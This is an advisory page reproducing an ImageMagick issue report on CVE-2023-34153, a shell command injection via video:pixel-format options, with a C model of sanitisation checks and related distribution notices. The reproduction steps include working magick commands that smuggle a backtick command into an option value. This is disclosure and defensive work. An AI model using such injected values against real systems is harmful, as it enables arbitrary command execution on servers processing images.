Headline
CVE-2023-34153: Shell command injection vulnerability via `video:vsync` or `video:pixel-format` options in VIDEO encoding/decoding. · Issue #6338 · ImageMagick/ImageMagick
A vulnerability was found in ImageMagick. This security flaw causes a shell command injection vulnerability via video:vsync or video:pixel-format options in VIDEO encoding/decoding.
ImageMagick version
7.1.0-1
Operating system
Linux
Operating system, version and so on
Any
Description
In reviewing historical vulnerabilities in ImageMagick, I discovered a shell command injection vulnerability in encoding/decoding VIDEO files, which very much resembles CVE-2020-29599.
In commit cc4638d, extra options are supported in VIDEO decode delegate execution, and through later commits, ImageMagick supports the user-defined options video:vsync and video:pixel-format, with their values concatenated into the delegate command executed via ExternalDelegateCommand.
In ExternalDelegateCommand, the command string is sanitized with SanitizeString and scanned for illegal chars, then passed to system(). However, the illegal char set contains only "&;<>|", not the quote character (see link). This is the same mistake as in sanitizing the -authenticate parameter in PDF password support, but the common vulnerability in ExternalDelegateCommand did not get fixed.
Steps to Reproduce
Trigger the vulnerability in VIDEO decoding
Given a normal video file, namely test.mov, the following demonstrates how command injection happens.
/data/home/fullwaywang/exp ➜ echo 'deadbeef' > test.txt
/data/home/fullwaywang/exp ➜ magick identify -define video:pixel-format='rgba"`cat test.txt > /tmp/leak.txt`"' test.mov >info.log
/data/home/fullwaywang/exp ➜ tail info.log
test.mov[891] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.320u 0:00.312
test.mov[892] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.310u 0:00.298
test.mov[893] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.290u 0:00.285
test.mov[894] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.280u 0:00.271
test.mov[895] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.260u 0:00.258
test.mov[896] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.250u 0:00.244
test.mov[897] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.230u 0:00.231
test.mov[898] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.220u 0:00.218
test.mov[899] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.210u 0:00.204
test.mov[900] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 445.5MiB 0.200u 0:00.191
/data/home/fullwaywang/exp ➜ cat /tmp/leak.txt
deadbeef
Trigger the vulnerability in VIDEO encoding
Given a normal image file, namely smile.gif, the following demonstrates how command injection happens.
/data/home/fullwaywang/exp ➜ magick convert -define video:pixel-format='rgba"`cat test.txt > /tmp/leak3.txt`"' smile.gif smile.mov
/data/home/fullwaywang/exp ➜ cat /tmp/leak3.txt
deadbeef
Images
No response
Reporter
fullwaywang
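The report's core point is that a character denylist of "&;<>|" says nothing about quotes, backticks or "$", so a value built from them still reaches system() intact. The following C program, added here as an illustration and not taken from ImageMagick's own SanitizeString() or ExternalDelegateCommand() code, models that narrow denylist beside two stricter checks: a fuller shell-metacharacter scan and an allowlist that only admits the short alphanumeric tokens a video:pixel-format or video:vsync value can legitimately be (the 32-byte bound is an assumption for this example).

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Narrow character denylist as the report describes it ("&;<>|").
   Model written for this note, not ImageMagick's own code. */
static const char NARROW_DENYLIST[] = "&;<>|";

/* Broader set of POSIX shell metacharacters a denylist would need to
   cover; quotes, backtick and '$' are what the narrow set misses. */
static const char SHELL_META[] = "&;<>|\"'`$(){}[]*?~\\ \t\n\r";

/* True when the value contains a character from the narrow set. */
bool narrow_denylist_rejects(const char *value)
{
    return strpbrk(value, NARROW_DENYLIST) != NULL;
}

/* True when the value contains any shell metacharacter. */
bool shell_meta_rejects(const char *value)
{
    return strpbrk(value, SHELL_META) != NULL;
}

/* Allowlist: a pixel-format or vsync value is a short token of letters,
   digits, '_' or '-' (e.g. rgba, yuv420p, cfr, passthrough).  Anything
   else is refused before it can be spliced into a delegate command. */
bool allowlist_accepts(const char *value)
{
    size_t len = strlen(value);
    if (len == 0 || len > 32)
        return false;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)value[i];
        if (!isalnum(c) && c != '_' && c != '-')
            return false;
    }
    return true;
}

int main(void)
{
    /* Constructed inputs: two ordinary values and one carrying only the
       characters the narrow denylist does not look for. */
    const char *samples[] = { "rgba", "yuv420p", "rgba\"`true`\"" };
    for (size_t i = 0; i < 3; i++)
        printf("%-16s narrow=%d meta=%d allow=%d\n", samples[i],
               narrow_denylist_rejects(samples[i]),
               shell_meta_rejects(samples[i]), allowlist_accepts(samples[i]));
    return 0;
}
```

The printed table shows the narrow check passing the quoted-backtick value (narrow=0) while both stricter checks refuse it, which is the gap the report describes.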
Related news
Ubuntu Security Notice 6200-2 - USN-6200-1 fixed vulnerabilities in ImageMagick. Unfortunately these fixes were incomplete for Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS. This update fixes the problem.
Gentoo Linux Security Advisory 202405-2 - Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution. Versions greater than or equal to 6.9.13.0 are affected.
Ubuntu Security Notice 6200-1 - It was discovered that ImageMagick incorrectly handled the "-authenticate" option for password-protected PDF files. An attacker could possibly use this issue to inject additional shell commands and perform arbitrary code execution. This issue only affected Ubuntu 20.04 LTS. It was discovered that ImageMagick incorrectly handled certain values when processing PDF files. If a user or automated system using ImageMagick were tricked into opening a specially crafted PDF file, an attacker could exploit this to cause a denial of service. This issue only affected Ubuntu 20.04 LTS.
ImageMagick before 6.9.11-40 and 7.x before 7.0.10-40 mishandles the -authenticate option, which allows setting a password for password-protected PDF files. The user-controlled password was not properly escaped/sanitized and it was therefore possible to inject additional shell commands via coders/pdf.c.